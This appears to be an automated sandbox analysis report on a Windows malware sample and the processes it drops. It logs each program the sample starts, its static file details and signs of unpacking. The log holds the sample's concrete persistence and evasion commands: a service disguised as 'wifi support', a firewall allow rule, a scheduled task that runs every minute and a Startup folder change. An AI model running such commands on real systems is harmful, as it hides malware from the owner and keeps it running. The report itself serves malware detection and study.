                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ozuqupbe
                          Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d"C:\Users\user\AppData\Local\Temp\309C.exe"
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A7F0.exe C:\Users\user\AppData\Local\Temp\A7F0.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BC16.exe C:\Users\user\AppData\Local\Temp\BC16.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D452.exe C:\Users\user\AppData\Local\Temp\D452.exe
                          Source: C:\Users\user\AppData\Local\Temp\BC16.exeProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\82aa4a6c48\
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\239.exe C:\Users\user\AppData\Local\Temp\239.exe
                          Source: C:\Users\user\AppData\Local\Temp\D452.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1D34.exe C:\Users\user\AppData\Local\Temp\1D34.exe
                          Source: C:\Users\user\AppData\Local\Temp\239.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2D04.exe C:\Users\user\AppData\Local\Temp\2D04.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1E7F.exe C:\Users\user\AppData\Local\Temp\1E7F.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2DB3.exe C:\Users\user\AppData\Local\Temp\2DB3.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\309C.exe C:\Users\user\AppData\Local\Temp\309C.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ozuqupbe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1E7F.tmp
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00419A4D SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5668:64:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_01
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5200
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_01
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: 0.0
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: hijaduvinijebup
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: mocisacatenu
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: wapejan
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: wovag
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: cbH
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: Piruvora
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: gukafipa
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: mawecamaxe
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: Hiwejanoji
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: Pusazide
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCommand line argument: hukujid
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCommand line argument: cbH
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCommand line argument: cbH
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: zmbGUZTICp.exeStatic PE information: More than 200 imports for KERNEL32.dll
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: zmbGUZTICp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\zazadix dori\kol.pdb source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdb source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
                          Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb* source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467354885.000000000500A000.00000004.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb. source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: A7F0.exe, 0000001F.00000002.675040264.000000006BE60000.00000002.00020000.sdmp
                          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
                          Source: Binary string: Windows.Storage.pdb- source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb| source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: shcore.pdbh source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbd source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbr source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdbn source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: 8C:\cuguzab xobu\17_dacop.pdbh source: zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: JC:\konukuwe_nuyujobapuyozi\la.pdbh source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\cuguzab xobu\17_dacop.pdb source: zmbGUZTICp.exe, zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: C:\konukuwe_nuyujobapuyozi\la.pdb source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp

                          Data Obfuscation:

                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Unpacked PE file: 8.2.2DB3.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe | Unpacked PE file: 11.2.309C.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe | Unpacked PE file: 24.2.tejjnepq.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | Unpacked PE file: 31.2.A7F0.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | Unpacked PE file: 31.2.A7F0.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Unpacked PE file: 8.2.2DB3.exe.400000.0.unpack .text:ER;.data:W;.gave:W;.noduf:W;.gafal:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\309C.exe | Unpacked PE file: 11.2.309C.exe.400000.0.unpack .text:ER;.data:W;.nife:W;.kiza:W;.lagoti:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe | Unpacked PE file: 24.2.tejjnepq.exe.400000.0.unpack .text:ER;.data:W;.nife:W;.kiza:W;.lagoti:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | Unpacked PE file: 31.2.A7F0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe | Code function: 0_2_00643634 push es; iretd
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe | Code function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe | Code function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exe | Code function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj | Code function: 5_2_00739540 push esi; ret
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj | Code function: 5_2_007394DB push esi; ret
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj | Code function: 6_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj | Code function: 6_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\gdrgbdj | Code function: 6_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe | Code function: 7_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe | Code function: 7_2_0047127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe | Code function: 7_2_0047123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe | Code function: 7_2_0047735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exe | Code function: 7_2_004753C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00932A9B push ebx; ret
